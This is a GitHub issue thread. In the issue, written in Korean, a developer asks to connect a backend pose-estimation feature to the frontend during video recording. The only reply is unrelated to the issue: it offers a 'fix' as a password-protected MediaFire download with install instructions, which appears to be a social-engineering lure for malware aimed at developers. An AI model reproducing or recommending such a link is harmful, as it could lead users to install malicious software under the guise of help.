### ISSUE TITLE
[video] Pose Estimation 프론트에 연결

### ISSUE THREAD

**Issue by LXXDJ** [InterviewExplorer/InterviewExplorer_front#10]
## 🌱 기능 내용
백엔드에 구현된 Pose Estimation 기능을 프론트에 연결

## 🌱 할 일
- [ ] 답변을 받을 때 영상녹화가 진행되는데 그때 Pose Estimation 기능도 같이 동작되도록 연결하기

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
